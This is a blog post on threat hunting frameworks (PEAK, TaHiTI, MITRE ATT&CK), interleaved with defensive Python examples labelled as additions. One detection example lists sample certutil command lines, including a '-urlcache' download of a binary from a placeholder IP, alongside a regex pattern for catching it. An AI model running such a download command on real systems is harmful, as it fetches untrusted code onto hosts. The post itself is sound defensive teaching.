Threat Hunt (TH) Programs - Understanding Threat Hunt Frameworks
- brencronin
- 14 hours ago
Updated: 13 hours ago
Threat Hunting Frameworks
Threat hunting is a proactive cybersecurity discipline that requires structure, strategy, and context. Two of the most popular threat hunting frameworks are PEAK and TaHiTI, with the MITRE ATT&CK framework playing a foundational role across all threat hunting efforts.
PEAK stands for Prepare, Execute, and Act with Knowledge.
TaHiTI stands for Targeted Hunting Integrating Threat Intelligence.
MITRE ATT&CK, while not a hunting framework per se, is a crucial reference for Tactics, Techniques, and Procedures (TTPs) and serves as the tactical map behind most modern threat hunts.
A Note on IOC-Based Threat Hunting
Indicator of Compromise (IOC)-based threat hunting, such as searching for specific IP addresses, file hashes, or domains, has its place, especially for known threats. However, these data sweeps should ideally be automated through tools like firewalls, EDR/XDR, or SIEM correlation rules. Threat hunting should focus beyond the basics, leveraging behavioral analysis, threat modeling, and hypotheses.
The PEAK Framework
PEAK organizes threat hunting into three stages:
Prepare
Execute
Act with Knowledge

It also outlines three types of hunts that can be conducted under these phases:
Hypothesis-Driven Threat Hunts
Baseline Threat Hunts
Model-Assisted Threat Hunts (M-ATH)
Hypothesis-Driven Threat Hunting
This approach starts by forming a logical hypothesis, such as:
“If adversaries are targeting remote access tools, then our organization may be at risk of RDP brute-force attacks using valid credentials.”
From there, the threat hunter investigates related indicators and behaviors in the environment.
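The RDP brute-force hypothesis above, turned into a hunt query as an added example that is not part of the original post: it scans constructed Windows Security logon events for a burst of failed RDP logons from one source that ends in a successful logon, which is the pattern the hypothesis predicts. The event format, the failure threshold and the time window are assumptions.

```python
"""Hypothesis-driven hunt for RDP brute force ending in a valid logon.
Added example, not from the original post. Event lines are constructed in the
shape of Windows Security logon events (4625 failed, 4624 success, LogonType 10 = RDP)."""
from collections import defaultdict
from datetime import datetime, timedelta

FAIL_THRESHOLD = 5               # failed RDP logons from one source before we care
WINDOW = timedelta(minutes=10)   # sliding window over which failures are counted

def parse(line):
    ts, eid, ltype, user, src = line.split("|")
    return {"ts": datetime.fromisoformat(ts), "eid": int(eid),
            "ltype": int(ltype), "user": user, "src": src}

def hunt_rdp_bruteforce(lines):
    """Return one finding per source IP whose >= FAIL_THRESHOLD RDP failures
    inside WINDOW were followed by a successful RDP logon from that source."""
    events = sorted((parse(l) for l in lines), key=lambda e: e["ts"])
    fails = defaultdict(list)    # src -> [(timestamp, user)] of recent failures
    findings = []
    for e in events:
        if e["ltype"] != 10:     # only RemoteInteractive (RDP) logons are in scope
            continue
        recent = [(t, u) for t, u in fails[e["src"]] if e["ts"] - t <= WINDOW]
        if e["eid"] == 4625:
            recent.append((e["ts"], e["user"]))
        elif e["eid"] == 4624 and len(recent) >= FAIL_THRESHOLD:
            findings.append({"src": e["src"], "user": e["user"],
                             "failures": len(recent),
                             "users_tried": sorted({u for _, u in recent})})
            recent = []          # one burst yields one finding
        fails[e["src"]] = recent
    return findings

# Constructed sample: a spray from 198.51.100.23 that succeeds, and a user typo.
SAMPLE = [
    "2024-05-01T08:00:00|4625|10|administrator|198.51.100.23",
    "2024-05-01T08:00:20|4625|10|jsmith|198.51.100.23",
    "2024-05-01T08:00:41|4625|10|svc_backup|198.51.100.23",
    "2024-05-01T08:01:02|4625|10|helpdesk|198.51.100.23",
    "2024-05-01T08:01:25|4625|10|svc_backup|198.51.100.23",
    "2024-05-01T08:01:50|4625|10|svc_backup|198.51.100.23",
    "2024-05-01T08:02:14|4624|10|svc_backup|198.51.100.23",
    "2024-05-01T08:05:00|4625|10|amiller|10.0.5.8",
    "2024-05-01T08:05:30|4625|10|amiller|10.0.5.8",
    "2024-05-01T08:06:00|4624|10|amiller|10.0.5.8",
]

if __name__ == "__main__":
    for f in hunt_rdp_bruteforce(SAMPLE):
        print(f"{f['src']}: {f['failures']} failures then success as {f['user']}")
```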
Baseline Threat Hunting
Baseline threat hunting focuses on understanding what "normal" looks like in your environment, then identifying anomalies that could signal malicious activity. While establishing baselines is often one of the hardest tasks to nail down in cybersecurity, it’s also one of the most valuable.
In practice, every threat hunt involves some form of implicit baselining. You’ve likely heard observations like, “This system talking to that system seems suspicious” or “This behavior is unusual for that endpoint.” These statements reflect a baseline, whether formally documented or informally understood.
True baseline threat hunting, however, takes this a step further. It involves explicitly defining expected behavior, such as:
System A should only communicate with System B over a specific port.
User accounts in Group X should never run administrative tools.
Workstations should not initiate outbound traffic to external IPs on non-standard ports.
Once these baselines are in place, the goal becomes clear: look for deviations that break the established norms. These deviations may indicate misconfigurations, insider threats, compromised assets, or shadow IT activity.
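The three baseline statements above, written down as explicit rules and checked against constructed telemetry, as an added example that is not from the original post; the host names, ports, group name, admin-tool list and internal ranges are all assumptions.

```python
"""Baseline hunt: flag telemetry that breaks explicitly defined norms.
Added example, not from the original post; hosts, ports, groups and tools are constructed."""
from ipaddress import ip_address, ip_network

BASELINE = {
    # System A should only communicate with System B over port 5432.
    "allowed_flows": {"system-a": {("system-b", 5432)}},
    # Accounts in this group should never run administrative tools.
    "no_admin_tools_groups": {"finance-users"},
    "admin_tools": {"psexec.exe", "wmic.exe", "net.exe", "powershell.exe"},
    # Workstations should not reach external IPs on non-standard ports.
    "workstation_prefix": "ws-",
    "standard_ports": {80, 443},
    "internal_nets": [ip_network("10.0.0.0/8"), ip_network("192.168.0.0/16")],
}

def is_external(ip):
    addr = ip_address(ip)
    return not any(addr in net for net in BASELINE["internal_nets"])

def check_event(ev):
    """Return a deviation description for one event, or None if it is within baseline."""
    src = ev["src"]
    if ev["type"] == "flow":
        allowed = BASELINE["allowed_flows"].get(src)
        if allowed is not None and (ev["dst"], ev["dport"]) not in allowed:
            return f"{src} contacted {ev['dst']}:{ev['dport']} outside its allowed flows"
        if (src.startswith(BASELINE["workstation_prefix"]) and is_external(ev["dst_ip"])
                and ev["dport"] not in BASELINE["standard_ports"]):
            return f"{src} initiated external traffic to {ev['dst_ip']}:{ev['dport']}"
    elif ev["type"] == "process":
        if (ev["group"] in BASELINE["no_admin_tools_groups"]
                and ev["image"].lower() in BASELINE["admin_tools"]):
            return f"{ev['user']} ({ev['group']}) ran admin tool {ev['image']} on {src}"
    return None

def find_deviations(events):
    """Apply the baseline to a batch of events; every deviation is a hunt lead."""
    return [d for d in (check_event(e) for e in events) if d is not None]

# Constructed sample telemetry: events 0 and 2 are within baseline, the rest deviate.
EVENTS = [
    {"type": "flow", "src": "system-a", "dst": "system-b", "dst_ip": "10.0.1.5", "dport": 5432},
    {"type": "flow", "src": "system-a", "dst": "system-c", "dst_ip": "10.0.1.9", "dport": 445},
    {"type": "flow", "src": "ws-0142", "dst": "ext-host", "dst_ip": "203.0.113.7", "dport": 443},
    {"type": "flow", "src": "ws-0142", "dst": "ext-host", "dst_ip": "203.0.113.7", "dport": 4444},
    {"type": "process", "src": "ws-0077", "user": "jdoe", "group": "finance-users",
     "image": "PsExec.exe"},
]

if __name__ == "__main__":
    for finding in find_deviations(EVENTS):
        print("DEVIATION:", finding)
```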
Model-Assisted Threat Hunting
Model-Assisted Threat Hunting leverages machine learning and advanced analytics to identify anomalies or behavioral patterns that may signal malicious activity. This approach often involves building models that define what is considered "normal" or "malicious" behavior across systems, users, or network activity.
By using these models, threat hunters can proactively detect subtle indicators of compromise that might evade traditional rule-based detection. Some of the most widely used families of machine learning algorithms in this space include:
Classification - Classification algorithms are used to predict the category or class of a given data point (e.g., malicious vs. benign). These are typically supervised learning models trained on labeled datasets to recognize known patterns of good or bad behavior.
Clustering - Clustering groups similar data points together without prior labeling. It helps uncover hidden structures or relationships in the data. Different clustering algorithms use various methods to assess similarity and group data accordingly, making this approach effective for uncovering previously unknown threat patterns.
Time Series Analysis - Also known as forecasting, time series analysis involves analyzing sequences of data points collected over time. These algorithms are useful for identifying trends, seasonality, and sudden deviations that may suggest emerging threats or operational issues.
Anomaly Detection - Anomaly detection algorithms are designed to identify outliers, data points that deviate significantly from the norm. These can be statistical or machine learning-based and are effective in surfacing rare or unexpected behavior that may indicate compromise.
PEAK Threat Hunting – Scope and Planning
The PEAK threat hunting methodology incorporates the ABLE framework, which helps structure the investigative scope of a threat hunt.
ABLE stands for:
A – Actor
B – Behavior
L – Location
E – Evidence
The ABLE framework guides threat hunters in defining the core elements of the investigation. By identifying the threat actor (or suspected adversary), the behaviors associated with the threat, the systems or locations where those behaviors may occur, and the evidence required to confirm or refute the activity, hunters can more effectively focus their investigative efforts and define the scope of the threat hunt mission.
PEAK Threat Hunting – Execution
The Execution phase involves collecting, processing, and analyzing data relevant to the threat hunt hypothesis.
Data sources typically include SIEM telemetry, but may also incorporate additional sources such as endpoint telemetry, network logs, identity data, or other security platform data depending on the scope of the hunt.
During execution, threat hunters perform analytical activities including:
Query development and execution
Data correlation and filtering
Behavioral analysis
Data visualization
Pattern identification
All analytical techniques used during the hunt, such as queries, dashboards, and visualizations, should be documented for reproducibility and future reuse.
As the investigation progresses, findings may require refinement of the threat hunt hypothesis or expansion of the investigation scope. If evidence of potential malicious activity is identified, findings should be escalated to the appropriate incident response or SOC teams for further investigation.
PEAK Threat Hunting – Act
The Act phase focuses on operationalizing the results of the threat hunt.
Key activities include:
Preserving and documenting the threat hunt investigation, including queries, methodologies, and findings
Developing new detections or improving existing detections based on insights gained during the hunt
Updating the threat hunt backlog with new hypotheses or investigative opportunities identified during the mission
Communicating findings and analysis results to relevant stakeholders, including SOC teams, detection engineering teams, and leadership
This phase ensures that the knowledge gained from the threat hunt improves the organization’s long-term detection capabilities and overall security posture.
TaHiTI Threat Hunting Model
The Targeted Hunting Integrating Threat Intelligence (TaHiTI) model was developed by a consortium of Dutch financial institutions under the Dutch Payments Association (Betaalvereniging Nederland). Contributors included security professionals from de Volksbank, Rabobank, ING, ABN AMRO Bank, and members of FinancialCERT.
TaHiTI organizes the threat hunting process into three structured phases: Initiate, Hunt, and Finalize. One of the model’s key strengths is its grounding in real-world operational needs, particularly within large organizations.
TaHiTI - Phase 1: Initiate
The Initiate phase focuses on defining the reason and scope for the threat hunt. This begins with a trigger, which could come from executive directives, emerging threat intelligence, newly disclosed vulnerabilities, or recent incidents. In real-world environments, hunting teams often juggle requests from leadership while staying responsive to the latest threats.
To manage these demands effectively, TaHiTI encourages the creation of an investigation abstract, a concise, high-level summary that clearly communicates the rationale behind the hunt. This abstract becomes a crucial tool for aligning technical efforts with organizational priorities and maintaining transparency with stakeholders.
Another important aspect of this phase is prioritization. Not every trigger demands immediate action. The team must evaluate whether the new hunt should take precedence over existing efforts or be added to a backlog of scheduled threat hunts. Having a structured intake and prioritization process ensures resources are allocated where they can provide the most value.

The figure below categorizes common triggers that initiate threat hunting activities:
Threat Intelligence - Intelligence feeds are one of the most powerful sources for initiating threat hunts. Indicators of compromise (IOCs), adversary TTPs, and campaign reports can all highlight areas worth deeper investigation.
Ongoing Threat Hunts - Threat hunting can be recursive: findings from one hunt often uncover anomalies or patterns that spark new investigations. This iterative approach helps deepen threat visibility over time.
Security Monitoring - The TaHiTI model emphasizes strong integration with an organization’s security monitoring capabilities. Alerts, suspicious patterns, or telemetry gaps identified through SIEMs or EDR tools can all trigger targeted threat hunts.
Incident Response (IR) - Active incidents or red team exercises frequently expose blind spots or threat behaviors worth investigating further. These insights serve as rich sources for generating new hunt hypotheses.
Other Organizational Drivers - Several additional factors can trigger threat hunts, including:
Crown Jewel Analysis (protecting mission-critical assets)
Domain Expertise (knowledge from SMEs or SOC analysts)
MITRE ATT&CK Mapping (identifying gaps or TTP coverage)
Executive Directives (risk-based decisions from leadership)
Emerging Vulnerabilities and Exploits (new threats in the wild)

A well-structured threat hunt abstract helps ensure clarity, alignment, and traceability throughout the hunt lifecycle. The following components are essential:
Date - The date the abstract was created or the hunt was initiated.
Initial Hypothesis - A concise, testable hypothesis outlining the suspected threat or behavior being investigated.
Trigger - The event, intelligence, or insight that initiated the threat hunt. Include all relevant context and attach supporting artifacts (e.g., threat intel reports, detection alerts, IOC lists).
Hunt Priority - The urgency of the hunt, typically based on the potential threat level. Factors that influence priority may include:
Active threat campaigns targeting the organization or industry
Known adversary groups using relevant TTPs
Existing detection or prevention coverage
Observed exploitation in the wild
A clear and consistent abstract ensures stakeholders, technical and non-technical, can quickly understand the scope, rationale, and urgency of the threat hunt.
TaHiTI - Phase 2: Hunt
In the TaHiTI threat hunting model, Phase 2, the Hunt phase, consists of two closely integrated processes: Define/Refine and Execute.
Define/Refine involves expanding the initial threat hunt concept or abstract into a structured investigative plan. During this step, threat hunters enrich the original idea by incorporating relevant threat intelligence, defining or refining the investigative hypothesis, identifying the required data sources, and determining the analytical techniques that will be used during the hunt.
Once the hunt parameters are defined, the process moves into the Execute stage. During execution, analysts retrieve and analyze relevant telemetry to test and validate the hypothesis. This typically involves querying security data sources, correlating events, and examining behavioral patterns to determine whether evidence of the hypothesized activity exists.
The Define/Refine and Execute processes operate iteratively. As analysts analyze the data, new insights may emerge that require adjustments to the hypothesis, investigative scope, or analytical methods. When this occurs, the process cycles back to Define/Refine, where the hypothesis and investigation plan are updated before execution continues.
This iterative cycle continues until the hypothesis is validated, disproven, or the investigation reaches an acceptable level of analytical confidence.
TaHiTI - Phase 3: Finalize
One of the most impactful parts of the Finalize phase in a threat hunt is the handover. This is where the insights gained during the hunt are translated into actionable outcomes across the broader security organization, and it is where threat hunting truly delivers its value.
Key Handover Areas:
Security Incident Response - If the hunt uncovered indicators of a real security incident, this information must be escalated immediately to the incident response team for containment, eradication, and recovery efforts.
Security Monitoring - Recommendations for improving detection should be passed to the security monitoring team. If new use cases or detection gaps were identified, provide actionable content, not vague suggestions commonly found in red team reports.
Don’t just say, “The organization needs better detection for attack XYZ.”
Instead, include detection logic, such as sample KQL queries or Sigma rules.
Also, evaluate and document false positive considerations to help the SOC tune these rules effectively.
Threat Intelligence - If the hunt revealed new Tactics, Techniques, or Procedures (TTPs) not previously documented, these should be integrated into the threat intelligence process. This keeps the organization’s CTI program current and relevant.
Vulnerability Management - If the hunt exposed exploitable misconfigurations, unpatched systems, or weak controls, hand these findings off to the vulnerability management or IT operations teams for remediation before attackers can take advantage.
Other Relevant Teams - Depending on the findings, there may be additional handovers to:
Network Security (e.g., for segmentation gaps)
Identity & Access Management (e.g., for privilege misuse)
Governance & Risk (e.g., if findings impact compliance posture)

MITRE ATT&CK Framework
The MITRE ATT&CK framework organizes attacker behavior into:
Tactics – The adversary’s objective (e.g., Initial Access, Persistence, Command and Control)
Techniques – Methods used to achieve the tactic
Sub-techniques – Specific implementations of techniques
Threat hunters use ATT&CK to identify which adversary behaviors should be investigated within an environment.
Example:
ATT&CK Tactic      | Example Technique     | Threat Hunt Focus
Persistence        | Registry Run Keys     | Hunt for unusual registry persistence
Command & Control  | Web Protocols         | Hunt for suspicious outbound HTTP
Credential Access  | LSASS Memory Dumping  | Hunt for abnormal credential access activity
ATT&CK therefore acts as a behavioral library of attacker activity that threat hunters can investigate.
ATT&CK Drives Threat Hunt Hypothesis Creation
Many threat hunts begin with ATT&CK technique hypotheses.
Example hypothesis:
“If an attacker is attempting credential access using LSASS dumping (ATT&CK T1003), we should observe abnormal access to the LSASS process.”
The hunt then investigates telemetry such as:
Endpoint process access logs
EDR telemetry
Memory access patterns
Thus ATT&CK helps hunters move from abstract intelligence to concrete investigative queries.
ATT&CK Helps Map Data Sources
ATT&CK also provides guidance on data sources required to detect techniques, such as:
Process creation
Authentication logs
Network traffic
Registry activity
Threat hunting frameworks use this mapping to determine which telemetry should be queried during the hunt.
ATT&CK Enables Detection Gap Analysis
Another major relationship between ATT&CK and threat hunting frameworks is detection coverage analysis.
Threat hunters often perform ATT&CK coverage mapping, rating the existing detection coverage for each technique to decide where a hunt is needed.
Example:
Technique                  | Detection Coverage | Threat Hunt Need
PowerShell execution       | Partial            | Conduct hunt
Scheduled task persistence | None               | High-priority hunt
WMI lateral movement       | Strong             | Monitor
Threat hunts are often launched specifically to validate coverage gaps identified in ATT&CK mappings.
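An added example, not from the original post, that turns a coverage table like the one above into a prioritized hunt backlog and a minimal ATT&CK Navigator layer for visualising the gaps. The technique IDs are real ATT&CK identifiers for the three techniques in the table; the coverage ratings are constructed and the Navigator version fields are assumptions to adjust to the instance in use.

```python
"""ATT&CK coverage mapping -> hunt backlog and Navigator layer.
Added example, not from the original post; coverage ratings are constructed."""
import json

# Coverage rating -> what the hunt program does about it (as in the table above).
HUNT_NEED = {"None": "High-priority hunt", "Partial": "Conduct hunt", "Strong": "Monitor"}
PRIORITY = {"None": 3, "Partial": 2, "Strong": 1}   # higher = hunt sooner

# Constructed coverage assessment keyed by ATT&CK technique ID.
COVERAGE = {
    "T1059.001": ("PowerShell execution", "Partial"),
    "T1053.005": ("Scheduled task persistence", "None"),
    "T1047": ("WMI lateral movement", "Strong"),
}

def build_hunt_backlog(coverage):
    """Return backlog entries ordered so the weakest-covered techniques come first."""
    backlog = [{"technique": tid, "name": name, "coverage": cov,
                "hunt_need": HUNT_NEED[cov], "priority": PRIORITY[cov]}
               for tid, (name, cov) in coverage.items()]
    return sorted(backlog, key=lambda b: -b["priority"])

def navigator_layer(coverage, name="Hunt coverage"):
    """Build a minimal ATT&CK Navigator layer (score 0..2 = None..Strong).
    The 'versions' values are assumptions; set them to match your Navigator."""
    score = {"None": 0, "Partial": 1, "Strong": 2}
    colour = {"None": "#ff6666", "Partial": "#ffe766", "Strong": "#8ec843"}
    return {
        "name": name,
        "versions": {"attack": "15", "navigator": "4.9.1", "layer": "4.5"},
        "domain": "enterprise-attack",
        "techniques": [
            {"techniqueID": tid, "score": score[cov], "color": colour[cov],
             "comment": f"{desc}: {HUNT_NEED[cov]}", "enabled": True}
            for tid, (desc, cov) in coverage.items()],
    }

if __name__ == "__main__":
    for e in build_hunt_backlog(COVERAGE):
        print(f"{e['technique']:<10} {e['name']:<28} {e['coverage']:<8} -> {e['hunt_need']}")
    print(json.dumps(navigator_layer(COVERAGE), indent=2))
```

The printed JSON can be loaded into ATT&CK Navigator (linked in the references) to colour the matrix by coverage.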
ATT&CK Supports Detection Engineering After Hunts
After a threat hunt completes, findings are frequently converted into ATT&CK-mapped detections.
Example:
Threat Hunt Finding → suspicious certutil download behavior
Detection created → ATT&CK technique: Ingress Tool Transfer
This allows security programs to measure detection maturity against the ATT&CK framework.
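An added example, not the post's own content, of the handover artifact the Finalize phase asks for: detection logic for the certutil download finding above, mapped to Ingress Tool Transfer (T1105), together with the false-positive considerations the text says should accompany it rather than a vague "needs better detection" note. The process-creation events, the allowlisted PKI host and the allowlisted parent process are constructed assumptions.

```python
"""Post-hunt detection for the 'suspicious certutil download' finding, ATT&CK T1105.
Added example, not from the original post; events and allowlists are constructed
and the false-positive list must be tuned to the environment."""
import re

# Detection logic handed to the monitoring team: certutil invoked with its
# URL-cache option against a remote HTTP(S) source.
DOWNLOAD_FLAG = re.compile(r"(?i)[-/]urlcache\b")
REMOTE_SOURCE = re.compile(r"(?i)\bhttps?://([^/\s]+)")

# False-positive considerations documented with the rule (constructed):
# an internal PKI host that certutil legitimately fetches CRLs from, and a
# patch-management agent that calls certutil from an approved script.
FP_ALLOWED_HOSTS = {"pki.corp.example"}
FP_ALLOWED_PARENTS = {r"c:\program files\patchmgmt\agent.exe"}

def is_certutil_download(ev):
    cmd = ev["cmdline"]
    return (ev["image"].lower().endswith("certutil.exe")
            and DOWNLOAD_FLAG.search(cmd) is not None
            and REMOTE_SOURCE.search(cmd) is not None)

def is_known_false_positive(ev):
    host = REMOTE_SOURCE.search(ev["cmdline"])
    return ((host is not None and host.group(1).lower() in FP_ALLOWED_HOSTS)
            or ev["parent"].lower() in FP_ALLOWED_PARENTS)

def detect(events):
    """Return alerts with the ATT&CK mapping and the tuning decision for each."""
    alerts = []
    for ev in events:
        if not is_certutil_download(ev):
            continue
        alerts.append({"host": ev["host"], "user": ev["user"], "technique": "T1105",
                       "cmdline": ev["cmdline"],
                       "suppressed": is_known_false_positive(ev)})
    return alerts

EVENTS = [  # constructed process-creation telemetry
    {"host": "ws-0142", "user": "jdoe", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://203.0.113.7/update.bin update.bin"},
    {"host": "srv-pki1", "user": "svc_pki", "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -f http://pki.corp.example/crl/root.crl root.crl"},
    {"host": "ws-0077", "user": "amiller", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -hashfile installer.msi SHA256"},
]

if __name__ == "__main__":
    for a in detect(EVENTS):
        print(("SUPPRESSED " if a["suppressed"] else "ALERT ") + a["host"], a["cmdline"])
```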
ATT&CK Enables Threat Actor-Based Hunting
Many threat intelligence reports map threat actors to ATT&CK techniques.
Example mapping:
Threat Actor → Techniques used → Threat hunt targets
Threat hunters can then search for those specific behaviors in their environment.
This approach is commonly called ATT&CK-based threat hunting.
References
PEAK Threat Hunting Framework:
The PEAK Threat Hunting Template You'll Wish You Had Sooner
TaHiTI Threat Hunting Model:
ATT&CK - Adversary TTPs - attack.mitre.org
D3FEND - Defensive Countermeasures - d3fend.mitre.org
RE&CT - Incident Response - https://atc-project.github.io/react-navigator/
ENGAGE - Deception & Engagement - https://engage.mitre.org/matrix/
ATLAS - AI/ML Security - https://atlas.mitre.org/matrices/ATLAS
EMB3D - Embedded Device Security - emb3d.mitre.org
FiGHT - 5G Infrastructure - fight.mitre.org
CREF - Cyber Resiliency - https://crefnavigator.mitre.org/navigator
ATT&CK Navigator - https://mitre-attack.github.io/attack-navigator/